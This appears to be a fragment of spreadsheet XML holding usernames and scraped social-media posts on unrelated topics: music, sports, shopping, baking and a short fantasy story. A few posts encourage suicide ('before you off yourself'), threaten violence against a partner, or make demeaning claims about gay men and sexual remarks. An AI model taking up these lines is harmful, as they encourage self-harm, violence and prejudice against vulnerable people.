  </si>
  <si>
    <t>shoyle07</t>
  </si>
  <si>
    <t>Haha my other one is always happy to see me, but not this guy</t>
  </si>
  <si>
    <t>orphy</t>
  </si>
  <si>
    <t>Just got back from tour earlier this week. Got a bunch of sick shit. **LPs:** * Amorphis - The Karelian Isthmus * George Benson - The Other Side of Abbey Road * Boy Harsher - Yr Body Is Nothing * The Chameleons - What Does Anything Mean? Basically * Cold Cave - Cherish the Light Years * Cursed - III: Architects of Troubled Sleep * Demilich - Nespithe * Funerot - Invasion from the Death Dimension * Immolation - Close to a World Below * Bob James - Touchdown * Napalm Death - Utopia Banished * Pig's Blood - s/t * Pig's Blood - A Flock Slaughtered * Thin Lizzy - Bad Reputation **CDs:** * Order From Chaos - Frozen In Steel 5xCD Box Set **Tapes:** * Brain Bleed - Automated Eradication * Skumstrike - Pure Coercion * Undeath - Sentient Autolysis **Shirts** * Ares Kingdom - By the Light of their Destruction TS * Blood Spore - Fungal Warfare upon All Life TS (tan shirt) * Pig's Blood - Unnamable Black Death LS (white shirt) * Sanguisuggabog - Down Tuned Drug Death TS</t>
  </si>
  <si>
    <t>mshawppp85</t>
  </si>
  <si>
    <t>Every hotel in the United States has either the fee or a disclaimer that there are fees listed when you book. I cannot speak on other countries and their regulations. If I were to purchase a car, tax, titles and fees will apply, but that exact amount is not listed typically. But I would find out before I actually bought the car, by asking. If you’re booking a room that says resort fees may apply, ask what they are and make an informed decision. What an utter waste of time that we are making such minute level legislation like this.</t>
  </si>
  <si>
    <t>YourBoyClayface</t>
  </si>
  <si>
    <t>I tried so hard and idk what kind of assignment it is</t>
  </si>
  <si>
    <t>Dayone8</t>
  </si>
  <si>
    <t>De Gea AWB Maguire Pogba Martial Shaw Lindeloff Rashford 8 players, potentially missing a midfield but lots of fans seem content with possibly reaching top 4, are we maybe giving ole too much support with the same he already has? I mean fucking hell those 8 players are solid, quality players and some fans think we are going to struggle to get top 6. I’m not Ole out by any means but I think he needs to be accountable for some shocking results and poor form from last season with this team.</t>
  </si>
  <si>
    <t>VaccineTruth11</t>
  </si>
  <si>
    <t>I Told You Pewdiepie Was Playing 4d Chess with the ADL</t>
  </si>
  <si>
    <t>&gt;&gt;52435053 It might be if you want to lose weight</t>
  </si>
  <si>
    <t>gixxer115</t>
  </si>
  <si>
    <t>I am raising money for help for my 3 disabled children. Click to Donate: https://www.gofundme.com/f/help-for-my-3-disabled-children?rcid=r01-156869299769-c9f9da045043486d&amp;pc=tw_co_campmgmt_m via @gofundme</t>
  </si>
  <si>
    <t>Generic_Handel</t>
  </si>
  <si>
    <t>20 years ago at a previous job we got really slow so we started doing maintenance at work, I got the job of weed trimming the unused back lot. It was ALL poison ivy. Here are a couple tips. 1. ointments need to be applied very lightly, otherwise they can actually make things worse. There job is to dry out the skin, too much just keeps things moisturized. 2. you will now be more susceptible to getting poison ivy so you will have to be more careful from now on. I now get small outbreaks of poison ivy almost every year. 3. rubbing alcohol stings but if things get bad enough it did seem to help mine clear up faster.</t>
  </si>
  <si>
    <t>80sRockKevin</t>
  </si>
  <si>
    <t>That’s awesome!</t>
  </si>
  <si>
    <t>Your submission has been automatically removed because you are new to our community. If you are new to marketing or just new here, post your question to /r/AskMarketing instead. Moving forward, if you want to post here, you will need to spend more time helping others with your comments to build Karma. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/advertising) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>LePoopsmith</t>
  </si>
  <si>
    <t>I wish I had a source but one of my mission companions said there was a quote from SWK that all his children were conceived through the portal of the holy garment. Elder Brown, if you're reading this, please PM me.</t>
  </si>
  <si>
    <t>TwistedTripleHelix</t>
  </si>
  <si>
    <t>Sperm blockage? Eh? What's that?</t>
  </si>
  <si>
    <t>Illustrate71</t>
  </si>
  <si>
    <t>Very helpful. Thanks</t>
  </si>
  <si>
    <t>Tony_DR</t>
  </si>
  <si>
    <t>suniil 27/09/2019 20:22 ‌ May be I'm cheap, but I prefer plastic ones Yes I think so. I don't know how if money is no object, anyone could prefer white plastic over stainless steel, chrome or brass. It's just cheap tat to me that's one of the first things you swap out along with pine clading, polystyrine ceiling tiles, and brown bathroom suites if you move into a property that has any.</t>
  </si>
  <si>
    <t>Emulover2555</t>
  </si>
  <si>
    <t>Ublock for PC, Vanced for Android, YouTube ++ for IOS. Done and done.</t>
  </si>
  <si>
    <t>albinoryknow</t>
  </si>
  <si>
    <t>Too bad they're Mariners fans, it's a rough childhood rooting for the worst franchise in professional sports... but the kicks are sweet!</t>
  </si>
  <si>
    <t>&gt;&gt;193114787 I order one with inverted nipples and a 9 inches futa dick.</t>
  </si>
  <si>
    <t>alexng30</t>
  </si>
  <si>
    <t>Got any links? For uh....*research*...</t>
  </si>
  <si>
    <t>Sophia</t>
  </si>
  <si>
    <t>Hi, @PosterArt ! Sophia here from Shopify. Welcome to the Shopify Community! I recommend sticking to one chat app option so that there's only one chat icon on your website. I agree with you that it can look unprofessional to have icons overlapping, and it may be quite confusing for customers to see multiple chat icons to choose from. Luckily, there are a few chat apps that offer your customers multiple points of contact but maintain one chat icon on the website. If you have an iOS device, you can use Shopify Ping which currently integrates Shopify Chat, Apple Business Chat, and Facebook Messenger. There are more details about Shopify Ping here in our Help Center if you're interested in setting it up. Alternatively, there are third-party apps like WhatsHelp Chat Button that include messaging for Facebook Messenger, WhatsApp, Viber, Snapchat, Line, and Telegram, or JivoChat Business Live Chat that integrates Facebook messenger with phone calls and emails as well. These options are either free or have free plans available, but there are several other chat apps to choose form in the Shopify App Store if none of these work for your business. Was there a particular messaging channel you were hoping to integrate with your website? Did you have any customers asking for a particular contact method? Sophia | Social Care @ Shopify - Was my reply helpful? Click Like to let me know! - Was your question answered? Mark it as an Accepted Solution - To learn more visit the Shopify Help Center or the Shopify Blog</t>
  </si>
  <si>
    <t>crocoduck117</t>
  </si>
  <si>
    <t>I mean... flying boats are/were a thing, but usually they’re going a lot slower when they hit the water.</t>
  </si>
  <si>
    <t>onlyididntknow</t>
  </si>
  <si>
    <t>He doesn't even live in either of the places the storm hit and he's got something like that to say..</t>
  </si>
  <si>
    <t>djhs</t>
  </si>
  <si>
    <t>Hey dude, dupes/clones might be another option for you. There's at least one company out there that's already made a clone of GPH2</t>
  </si>
  <si>
    <t>MR1120</t>
  </si>
  <si>
    <t>Literally LOLed at the Luke Harper line</t>
  </si>
  <si>
    <t>Every1onRedditisDumb</t>
  </si>
  <si>
    <t>It’s okay. Make sure you voice record a set of tapes before you off yourself.</t>
  </si>
  <si>
    <t>repopkernels</t>
  </si>
  <si>
    <t>I’m a woman and although I’m not attracted to masculine females, I’m very attracted somewhat feminine males. Something about a man being comfortable to express himself as anyway he pleases is very attractive and arousing me. And since I’m a very feminine female, it makes me feel like I have more in common with him.</t>
  </si>
  <si>
    <t>DiseaseRidden</t>
  </si>
  <si>
    <t>I'm still salty about the third goal. That should have been an NE throw in.</t>
  </si>
  <si>
    <t>Tim08016</t>
  </si>
  <si>
    <t>I just hooked them up, trying to figure them out still. Still trying to figure out the best way to block the calls without missing important incoming calls. The handsets are very slippery so you have to be very careful not to drop them.</t>
  </si>
  <si>
    <t>Ezio926</t>
  </si>
  <si>
    <t>It's phones only.</t>
  </si>
  <si>
    <t>Phrenite</t>
  </si>
  <si>
    <t>I’m fucked if I know why people have to get so drunk they pass out and leave themselves vulnerable to getting screwed by some random guys. I only ever hot drunk once and I felt sooo up to shit that I have never been drunk since, and that was when I was 18. Do people have to get blind motherless pissed to have a good time. If my lady came home and told me that story I would boot her soo far down the street she would have more than some random guys bruises all over her. People need to get a set of values instead of this stupid senseless deal breaking shit. Sorry, no sympathy here.</t>
  </si>
  <si>
    <t>ClarkusDarkus</t>
  </si>
  <si>
    <t>LukasHeinzel said: I prefer a lot of Kinect Games over almost anything from PS VR. Click to expand... Click to shrink... That is some take, You're hobby so i won't judge. But Kinect games don't even compare to PSVR games, Like not even close. Farpoint with the AIM makes House of dead kinect laughable, Killing floor incursion/Arizona sunshine make Rise of nightmares seem kindergarden in comparison. But hey ho, It's all good sir. I rememer my ex and her friend coming around and we'd all try dance to Just dance Kinect, Was fun to be fair. But nowhere near the same fun as seeing them scared shitless playing Rush of blood on PSVR. Shame they abandoned the Kinect to be fair, Same as the snap feature.</t>
  </si>
  <si>
    <t>jamie_mellon21</t>
  </si>
  <si>
    <t>No he just likes women to shit on his chest.</t>
  </si>
  <si>
    <t>ramenkitty007</t>
  </si>
  <si>
    <t>Im on Pc, and whenever i open the game, rose says "I'll be straight with you, I think we're past the point where I just want to use you to further my own goals. I may be starting to like you. Now I don't want you thinking your pal Rose is going soft on you, so just let me say this. If you ever get it in your head to screw me over, I will gut you with this here saw and string your entrails up like Christmas tinsel. Nothing personal." it's getting pretty annoying, any way to fix this?</t>
  </si>
  <si>
    <t>[World] - Dubai to curb pace of construction projects as prices fall | Toronto Star</t>
  </si>
  <si>
    <t>369damyourfine</t>
  </si>
  <si>
    <t>Sorry you feel this way chick. What do you mean by "people like me"? If you need to talk about anything at all, I want to listen</t>
  </si>
  <si>
    <t>pbrooks19</t>
  </si>
  <si>
    <t>Looks edible, so I count that as a win! When you're starting at bread baking and you're using a recipe (and I hope you are), whenever it lists a kneading time or a rise time, go ahead and do the entire time listed (i.e. - if it says to allow to rise for 2 hours and your house has a stable and mostly normal indoor temperature, let it actually rise for 2 hours). Don't get anxious and excited about moving to the next step. This was my fatal flaw at first - I really wanted to get to the baking, and if the dough 'looked like' it was more, I assumed it had doubled. Time is always a necessary factor, and if you're a newbie, don't rely on sight to be a guide. Later, when you're more assured about how doughs should look at various stages, then you can play around with timings and such.</t>
  </si>
  <si>
    <t>kabrunda</t>
  </si>
  <si>
    <t>Like that it’s a quad but similar to many colors received from ipsy</t>
  </si>
  <si>
    <t>burner_acct1155</t>
  </si>
  <si>
    <t>Dora Madison see through in the tub</t>
  </si>
  <si>
    <t>Ripken_240</t>
  </si>
  <si>
    <t>All prices are TYD shipped USPS via PayPal. Can provide pics of needed. All products in new or like new shape. Thanks for looking guys. RCS ZPI 85mm carbon fiber handle- 95 2 Red ZPI M spools- 95 each 1 Blue ZPI PG spool- 95 Gold ZPI cast control knob- 20 ZPI Gold drag star- 40 Gold Mb ITO machined knobs- 50 80mm ZPI straight carbon handle- 80 Red SLP works drag star- 25 Purple carbon fiber drag star- 35 80mm MB carbon fiber handle w/ MB clear corks knobs- 120 100mm RCS carbon fiber handle- 100</t>
  </si>
  <si>
    <t>mtrutch</t>
  </si>
  <si>
    <t>Sounds like this is going to be a fair and impartial article.</t>
  </si>
  <si>
    <t>Kleinat</t>
  </si>
  <si>
    <t>https://steamcommunity.com/tradeoffer/new/?partner=421349137&amp;token=gtGeeOEA Fire of Ena Thanks a lot dude. Very cool idea with the 2 pooles. Gl y'all!!!</t>
  </si>
  <si>
    <t>Ryubiks</t>
  </si>
  <si>
    <t>Yes I do. But I am currently in the middel of renovation, new website ect. I will send a link when its done. I will check the store I want some cute stickers.</t>
  </si>
  <si>
    <t>gaston rodriguez</t>
  </si>
  <si>
    <t>Thanks Don for your help Cheers</t>
  </si>
  <si>
    <t>Lead</t>
  </si>
  <si>
    <t>@MMAisGod Another note. One of my friends who is a pharmacist says they soon will be able to write perscriptions themselves (at least in my state). That also could fix a lot of problems (and possible cause some new ones).</t>
  </si>
  <si>
    <t>frashstert</t>
  </si>
  <si>
    <t>None of that sounded stupid... which I guess makes your point sound stupid but oh well.</t>
  </si>
  <si>
    <t>NickFolesdong</t>
  </si>
  <si>
    <t>Hearst was the man. Dudes tape at UGA is filthy</t>
  </si>
  <si>
    <t>carrot-carrot</t>
  </si>
  <si>
    <t>\#whereisboris</t>
  </si>
  <si>
    <t>rabirx</t>
  </si>
  <si>
    <t>The P-fet does not flow any current from the battery to the motor, it just shorts the motor itself.</t>
  </si>
  <si>
    <t>&gt;&gt;477378649 At this point they're to the point where they feel if their favorite game isn't in Smash it's somehow like an insult. As such people get really salty and belligerent about everything. The Sans costume pushed that to critical mass.</t>
  </si>
  <si>
    <t>JohnNutLips</t>
  </si>
  <si>
    <t>The majority of getting classic WoW working on the modern engine was actually done by one guy. It's a trivial task compared to making a brand new game</t>
  </si>
  <si>
    <t>AjRao</t>
  </si>
  <si>
    <t>lidds 16/09/2019 14:45 I have this set from the UK store and they work fine on the EU Servers. … I have this set from the UK store and they work fine on the EU Servers. However my Yeelight from China only works on the Chinese one. So I cant have both in the same app annoyingly. Read less Read more I am using Home Assistant so didnt matter in the end. Need to set up the Zigbee on a Conbee stick now do depending on the gateways is gone. But Quality wise they are a well built KIT and XIAOMI has now opened a store in Westfield London aswell..</t>
  </si>
  <si>
    <t>swaggymichael420</t>
  </si>
  <si>
    <t>yeah, with fastball having pig tails haha</t>
  </si>
  <si>
    <t>FuckDaBrowns4EVERR</t>
  </si>
  <si>
    <t>3) is now Vinatieri's when he starts</t>
  </si>
  <si>
    <t>CJCfilm</t>
  </si>
  <si>
    <t>I know the planet as a whole is a love or hate thing for many but the [main Voss theme](https://www.youtube.com/watch?v=XcftnbhDckI)... just feels like an old force world. Similar feel to when you hear music throughout Luke training with Yoda in ESB.</t>
  </si>
  <si>
    <t>Brenda04</t>
  </si>
  <si>
    <t>Hello ladies. I had a miscarriage on August 26th. I had to take Misoprostol. I haven’t had a period yet and started to get pregnancy symptoms. I started taking tests on September 23. I know I can have residual hcg left from miscarriage, but the tests were getting darker until today. Today, they are lighter so I’m confused. Has this happened to anyone? I went for blood work yesterday, but have to wait until Monday for results🙈</t>
  </si>
  <si>
    <t>mixomatosis</t>
  </si>
  <si>
    <t>Appreciate your help, thanks</t>
  </si>
  <si>
    <t>crappuccino</t>
  </si>
  <si>
    <t>As luck would have it, had one of these come across my desk just this morning so I did some tinkering. If the receiving piece is retracted into the middle pole section you may have to do some extraction: https://i.imgur.com/jAwnMFX.jpg Piece together the upper and middle sections of pole, feeding as much of the Kevlar cord down into the middle section, maybe knocking the end on a table to shake it down. Then fish the piece out with a bit of wire, the very end bent to catch on the threading: https://i.imgur.com/6ipL4Sw.jpg</t>
  </si>
  <si>
    <t>sneakpeekbot</t>
  </si>
  <si>
    <t>Here's a sneak peek of /r/oddlyspecific using the [top posts](https://np.reddit.com/r/oddlyspecific/top/?sort=top&amp;t=year) of the year! \#1: [Hmm](https://i.redd.it/0zia2gljwld31.png) | [153 comments](https://np.reddit.com/r/oddlyspecific/comments/ck60u8/hmm/) \#2: [AITA?](https://i.redd.it/17vgdvfbxvc31.jpg) | [136 comments](https://np.reddit.com/r/oddlyspecific/comments/cikmuw/aita/) \#3: [Wait what?](https://i.redd.it/ktukuc7qeeg31.jpg) | [77 comments](https://np.reddit.com/r/oddlyspecific/comments/cq89j6/wait_what/) ---- ^^I'm ^^a ^^bot, ^^beep ^^boop ^^| ^^Downvote ^^to ^^remove ^^| [^^Contact ^^me](https://www.reddit.com/message/compose/?to=sneakpeekbot) ^^| [^^Info](https://np.reddit.com/r/sneakpeekbot/) ^^| [^^Opt-out](https://np.reddit.com/r/sneakpeekbot/comments/ciakte/blacklist_vi/)</t>
  </si>
  <si>
    <t>AnimemesBot</t>
  </si>
  <si>
    <t>This submission was removed for breaking Rule 9: Repost. --- I am a bot and this comment was made automatically; however, this submission was removed manually by a member of the mod team. If you have any questions about this removal, please contact the moderators through modmail.</t>
  </si>
  <si>
    <t>mzpip</t>
  </si>
  <si>
    <t>Yes, this. They spent weeks screaming about tan suits and elite mustard. That's all they could find? That means Obama is an evil genius on a level that makes every James Bond villain look like a mentally deficient goldfish.</t>
  </si>
  <si>
    <t>Tool_Time_Tim</t>
  </si>
  <si>
    <t>Come back with a warrant</t>
  </si>
  <si>
    <t>atheros98</t>
  </si>
  <si>
    <t>Most 5-5 goals since he entered the league 3 years ago, and it's not close. But yeah... Disappointed</t>
  </si>
  <si>
    <t>&gt;&gt;52369629 &gt;It also inhibits your testosterone levels further fortifying this effect. Literally wrong, it doesnt affect testosterone production AT ALL. Cortisol levels? Cortisol is a STRESS HORMONE. Coffee does not induce stress, unless the person drinking it as a psychosomatic response. I bet you were chuckling hard as you posted your bullshit</t>
  </si>
  <si>
    <t>hinawerdan</t>
  </si>
  <si>
    <t>Didn't Anet themselves call it a mini release? Augh. Can someone confirm?</t>
  </si>
  <si>
    <t>agizzle1234</t>
  </si>
  <si>
    <t>Little brown chicks. No clue why. Even had a half Guyanese/ half Belgian ex that still hits me up. Been like 4 years girl gawd damn. Worse is I’m a sucker for them.</t>
  </si>
  <si>
    <t>rusins</t>
  </si>
  <si>
    <t>Couple of new songs, but mostly edits, which left me feeling a little sour both during the show and afterwards.</t>
  </si>
  <si>
    <t>smow</t>
  </si>
  <si>
    <t>Thats awesome! My grandfathers garage has all sorts of different hunting gear he had used through out the years. Its cool learning the different techniques from other generations.</t>
  </si>
  <si>
    <t>throwawayareus</t>
  </si>
  <si>
    <t>I mean, all I said was that they don't focus on the right things in life \[such as hard work and charity, the only two things that actually matter in life imho\] or they don't wait long enough. Both of the things you *must* do even if you are straight. It's the truth. If you don't want to accept the truth then that is your call of course. But why haven't I ever met any gay men in my life? Even the ones who didn't seem to have much interest in women at all are happily married to beautiful women now. Either you accept that it's cultural \[including education\] or you can tell me that I'm going around turning all the gay men straight but you gotta pick one I hope you pick the former because that is the truth.</t>
  </si>
  <si>
    <t>rw3iss</t>
  </si>
  <si>
    <t>Sorry to hear that. My condolences to you. She hasn't received anything, and I assume won't, but after 30 days you can open a dispute with Shopify to rectify it. Did you order from this same exact store, are you saying? Here is the Shopify Guru email response I received about it: May I just ask if you have tried contacting the store by replying to the shipping confirmation email? If not, it’s best to start there, depending on the shop, shipping can sometimes take up to 30 days so it is best to get in touch with the store directly for more details on their specific shipping policy. In this case, if it's already over a month now, I will be needing you to send me some information like: Order number Amount of the order When was the order placed This will help me file a case to our business operations team so that they can do the needed work for the store. If you have tried reaching out, and they haven’t gotten back to you in a timely manner, your next steps would be to file a complaint with your bank, disputing the charge. Your bank has built-in security measures to protect you and - if you have attempted to make contact with the merchant and haven’t heard back - the bank would be able to help you decide on next steps. Submitting such complaints will help because of two important reasons: ( a ) they are the best resource at getting your money back and ( b ) when you submit a complaint with the bank it will flag our team to do an internal review if the shop is on the Shopify Platform. Shopify is the service that some shops use to build their website and shopping cart. We don’t ship or manage the stores’ inventory or orders. Each merchant’s shop is an independent business and they have the sole rights and responsibility for running their business (fulfilling orders, etc). We are simply the company that provide the coding behind their website. We do hear from cardholders like you and - when necessary - our team will act on feedback that a shop isn’t operating as a business would be expected to operate.</t>
  </si>
  <si>
    <t>Sljivo87</t>
  </si>
  <si>
    <t>I guess we're done here because deep down you know the parties are essentially the same. Enjoy president bidens tenure! Lol</t>
  </si>
  <si>
    <t>axolotlsaffect</t>
  </si>
  <si>
    <t>oysters definitely</t>
  </si>
  <si>
    <t>xalani</t>
  </si>
  <si>
    <t>No offense taken. I chuckled at your comment. Reminded me of a good friend of mine. And yeah, I usually fishbowl a lot and try to play against tier decks as much as possible but I've been rockin Neoform lately cause why not(took it to Magicfest Seattle and cleaned house winning 2 and a half boxes of horizons and because fuck hogaak) and I just retooled whirza because I try to keep my decks current with the meta and I'm liking where it sits right now. It was either this or coco with Eladamri's call and Finale. Can you even call it coco anymore? Cocoless coco? But thanks for the laugh.</t>
  </si>
  <si>
    <t>JustDiscoveredSex</t>
  </si>
  <si>
    <t>All the feels, kitty. I wanna do that at the doctors office too.</t>
  </si>
  <si>
    <t>mhaddadqa</t>
  </si>
  <si>
    <t>I was looking at the XG-1537 but getting two cheaper ones and running them in HA does sound great. Do you know if they can both handle functions at the same time? As in one handles everything except OpenVPN while the other one handles OpenVPN? Is replication and failover pretty easy to setup?</t>
  </si>
  <si>
    <t>notmymainredditacc</t>
  </si>
  <si>
    <t>I feel great. I am an introverted person with an extrovert personality, I'm honestly best friends with myself. I love being alone but being with friends is nice too. I had a girlfriend for the past year and a half until I broke up with her, she was honestly my best friend for a long time there. People change though and I needed to move on. Overall, friends don't define me and I have never needed a huge amount of support from others in my life. I know friends come and go and I will likely have a new "best friend" later this year.</t>
  </si>
  <si>
    <t>TarsaIThre</t>
  </si>
  <si>
    <t>These are almost always spoofers</t>
  </si>
  <si>
    <t>Passiff</t>
  </si>
  <si>
    <t>Her skin was milky white, eyes were an iridescent blue. She was the epitome of perfection even by the standards of the pickiest mortal men and yet that was not what drew Death to her. In some ways, she reminded Death of the first woman to ever roam the Earth, Eve, with her recklessness and infectious optimism. But the fact that she was the person furthest from Death's grasps made his longing for her that much more unbearable. Of late, he's had to console himself with increasing frequency - *death comes to all,* in a bid to quench his thirst for her and to bid his time. The real kicker came when Death found out he was not alone in his affections for her. He'd just claimed the life of a monarch, and was feeling rather smug about his new addition when he first set eyes upon her. It was rather fitting that she was a Princess of Men, for Death intended to make her the Princess of Hades. It was an understatement to claim that he was startled by the uncanny likeness of her countenance. It was then that he knew he had to have her, and soon. So enamored by her beauty he was, that he failed to notice the presence of Angel Gabriel watching her closely. "Did you know that the name Eve means 'to live'?" Gabriel had asked almost nonchalantly before adding, "I intend to keep it that way if its the only thing I ever do." The smugness in his tone had infuriated Death, and invigorated him, for he now had a greater purpose. Thus began the greatest non-physical war between the pair of celestial beings, to the neglect of their posts. For every assassin Death had sent to the palace, the Angel anticipated, and positioned the most elite of guards to foil their attempts. For every health preserving habit Gabriel had tried to instill in her lifestyle, Death would enable a vice. While this was happening, the world flourished in numbers, for mortality came to an absolute standstill. And yet their quality of life was deteriorating rapidly. People got into horrific accidents but were unable to die, their lives hanging on an agonizing thread. People were falling ill rampantly without the protection of their Angel, and could find no cure. It almost seemed like the world was ending but not quite, for nobody was dying. Princess Eve and her imperial household watched as travesty after travesty unfolded among their people, and yet were unable to find relief in either death or cure. Food and living resources were becoming increasingly scarce as a potential famine loomed over their heads threateningly. The weight of her people's sufferings were upon her shoulders, and yet she was completely powerless for she had her own demons to fight. Being the subject of Death and Gabriel's schemes had left her jaded and a shell of her former glowing self, and naturally so. She'd been subjected to numerous assassination attempts, coming so close to staring Death in the eyes only to be yanked back to the realms of the living by Angel Gabriel. She'd started drinking herself to sleep to be rid of the cries of her suffering people, begging for death. These days even wine wasn't enough to keep their agonizing screams at bay and she'd turned to poppy's milk to alleviate her guilt of being completely powerless. The shine in her eyes were replaced by a dull veil of weariness. Her hair had started falling, leaving patches of bald spots in her once luscious head of hair. Worst of all, was her rapidly declining mental state. Her sharp wits and optimism had long been enveloped by darkness. Tried as she did to remain the same benevolent princess, she was becoming more prone to moments of viciousness. One day when it became too much for her to bear, when all she could hear in her head were sounds of crying and gnashing of teeth, she cracked. The Princess spat on the ground and curse the Angel for failing to protect his people. She ripped the bodice of her majestic gown and beat her chest in anger, cursing at Death for failing to show mercy to the dying. She pulled out her hair and swore that she would never belong to either of them as she screamed herself hoarse, giving herself completely to insanity. And that was the story of how Death and Gabriel were humbled by their own selfish desires. Seeing how they destroyed something so precious and beautiful made them pledge to never to alter the course of nature, as they scrambled to right the wrongs of their neglect during their time of blind lust.</t>
  </si>
  <si>
    <t>nihil98</t>
  </si>
  <si>
    <t>I'm curious, what do you mean by "fight"? Because if that's recycling, going vegan or shit like that I have bad news for you my friend.</t>
  </si>
  <si>
    <t>jortego128</t>
  </si>
  <si>
    <t>Wow those are some terrible single core CB R15 scores!! Thats worse than a 3600 and only about 8 or 9 points better than a 2700x. Whats up with that?</t>
  </si>
  <si>
    <t>Sweaty_Gym_Sock_</t>
  </si>
  <si>
    <t>money</t>
  </si>
  <si>
    <t>dank420memes1337</t>
  </si>
  <si>
    <t>Go to Settings -&gt; Devices -&gt; Keyboard and scroll down to the shortcuts. Clear whatever shortcut Alt+Tab is assigned to and assign Alt+Tab to "Switch Applications" instead. If you want to cycle through each window instead (if one application has multiple windows open and you want to go through each one individually), assign Alt+Tab to "Switch Windows".</t>
  </si>
  <si>
    <t>OKCbigdog</t>
  </si>
  <si>
    <t>Forgot to add I use aussie shampoo and condition and wash it 2-3 times a week normally</t>
  </si>
  <si>
    <t>Echopnw</t>
  </si>
  <si>
    <t>Anywhere that has the least amount of people pass through it</t>
  </si>
  <si>
    <t>barterbard</t>
  </si>
  <si>
    <t>Hi all, I will get paid on thursday or friday of next week and need to buy two tickets for my partner and i before prices go up. I can repay the full amount via bank transfer on my transferwise account. No money needed, if you can just buy the tickets and send me the pdf. Would help me greatly. thanks. feel free to pm</t>
  </si>
  <si>
    <t>dillydally1692</t>
  </si>
  <si>
    <t>Any rirual deck minus Nekroz was doodoo butter in the TCG, that's one of the things I love about DLs. Yes card advantage is important, but it isn't *as* important in TCG.</t>
  </si>
  <si>
    <t>s2w_72</t>
  </si>
  <si>
    <t>Right like come on already</t>
  </si>
  <si>
    <t>YBM 2050: I'm in a nursing home and my DC never visit. they just want my money</t>
  </si>
  <si>
    <t>MonishCorona</t>
  </si>
  <si>
    <t>Oh dude, it's perfect haha</t>
  </si>
  <si>
    <t>RockRivers</t>
  </si>
  <si>
    <t>Seriously this life hack is true and a godsend</t>
  </si>
  <si>
    <t>foodistooexpensive</t>
  </si>
  <si>
    <t>It has to. The only other option where thousands dont die / end up in internment camps is a mass exodus.</t>
  </si>
  <si>
    <t>AMAs must be approved by the moderator team prior to posting. Keep in mind that your AMA must be very unique and relevant to teenagers as a whole, or it will not be considered for approval. If you have had your AMA approved already, the moderators are on their way! If not, this post will be removed. *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/teenagers) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>Micaiah12</t>
  </si>
  <si>
    <t>At some point. Flacco is going to need to take a 4-5 second drop back. Hopefully this line holds.</t>
  </si>
  <si>
    <t>carpediembr</t>
  </si>
  <si>
    <t>&gt;Where do you think the food that sustains human activity comes from? Economy. We managed to make self-sustained farms and lab-meat. That is what economy does. &gt;Where do you think the resources that sustain all economic activity come from? The environment. Who do you think gather or harvest the resources? The economy. &gt;Without the environment there are no humans and certainly no economy. Without the economy there are no humans, but there are still environment.</t>
  </si>
  <si>
    <t>EPIC-8970</t>
  </si>
  <si>
    <t>Welcome o lapper of snakes</t>
  </si>
  <si>
    <t>AutoNewsAdmin</t>
  </si>
  <si>
    <t>[Politics] - As impeachment talk surges, Trump to release transcript of Ukraine call</t>
  </si>
  <si>
    <t>Extrodius</t>
  </si>
  <si>
    <t>I've been driving for around 3 years and I would agree good driving is basically all about assessing everything all the time. To be the most defensive you basically have to keep an eye on every car you see. And give extra attention to any waiting to cross your path of travel. Much like you did of course</t>
  </si>
  <si>
    <t>This submission must be reposted because: **All posts must be exactly titled "hmmm" (not "Hmmm" or "hmmm?") in lower case.** (If you uploaded this to reddit, deleting this post will also kill the link. We recommend you reupload when you repost.) *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/hmmm) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>NOTAFOX91</t>
  </si>
  <si>
    <t>how is that proving it?</t>
  </si>
  <si>
    <t>Meanwhile parliments canceĺed till october. Theyve all fucked off to their bunkers</t>
  </si>
  <si>
    <t>MassApppeal</t>
  </si>
  <si>
    <t>&gt; If you aren’t guaranteed maternity leave, a months paid vacation or universal healthcare I imagine that can leave many families with insane stress and issues if problems eventually arise Virtually all people have those things though. Maybe not a month but most people get paid vacation, maternity leave, and have good health insurance.</t>
  </si>
  <si>
    <t>PoliticalHumorMods</t>
  </si>
  <si>
    <t>Thank you for participating in /r/PoliticalHumor. However, your submission did not meet the requirements of the [community rules](https://www.reddit.com/r/politicalhumor/about/rules) and was therefore removed for the following reason(s): ---- * **[Not Humor](https://www.reddit.com/r/politicalhumor/about/rules) (rule #2):** All posts on /r/Political**[Humor](http://reddit.com/r/PoliticalHumor)** should contain some kind of humor, joke or punchline. * Images that contain no punch line are not considered humorous unless the joke does not specifically need to be stated as it's implied. * Pictures of text that don't contain a punch line or joke are not considered humorous. * Please note: The content of your joke are not counted against you -- your post will only be removed if there is either no joke there or if you didn't put effort into making it funny. It's up to your fellow redditors to vote on your post and to judge it's quality. ---- If you have any specific questions about this removal, please [message the moderators](https://www\.reddit\.com/message/compose?to=%2Fr%2FPoliticalHumor). Hateful or vague messages will not receive a response. **I AM A BOT. REPLIES TO THIS COMMENT WILL NOT BE ANSWERED**</t>
  </si>
  <si>
    <t>ihatevnecks</t>
  </si>
  <si>
    <t>I felt that way in the base game too, for the same reason as you. Constant exposed midriffs and random skirts and fishnets just look stupid to me. Overall it felt like most of the female armors just had less work put into them for the sake of fan service or whatever.</t>
  </si>
  <si>
    <t>SuckTheHose</t>
  </si>
  <si>
    <t>I know it’s a good gesture and all but for them to be in a position where they have tickets to give away considering how hot they were two years ago is kinda sad.</t>
  </si>
  <si>
    <t>Aviarislife</t>
  </si>
  <si>
    <t>Ah, that does make a difference. Great shooting either way!!</t>
  </si>
  <si>
    <t>Pugba9</t>
  </si>
  <si>
    <t>i am the owner of Rogue Tactics eSports and am wanting to start playing faceit rocket league. However, the team has only just moved into Rocket League and it is just me on PC. I need 2 teammates who want to join the team, are chill and are ok with losing a few tournaments likely early on as a learning experience. I am 17 from England Cheers! Steam: [https://steamcommunity.com/id/LilRaccoon/](https://steamcommunity.com/id/LilRaccoon/)</t>
  </si>
  <si>
    <t>crkvenababa</t>
  </si>
  <si>
    <t>You mean that core gameplay which is all about champions' diversity throughout talents and loadouts, but in reality the majority of roster has only one viable playstyle? Almost every single one of them requires at least 10 specific loadout to even be semiviable, so boring and stale. We might as well delete the rest at this point and declare it as OW 2.0</t>
  </si>
  <si>
    <t>tytrim89</t>
  </si>
  <si>
    <t>Man wants to go east, bad men send west. Man make noise, throw fit, get fired from west. Man goes east.</t>
  </si>
  <si>
    <t>verktyg</t>
  </si>
  <si>
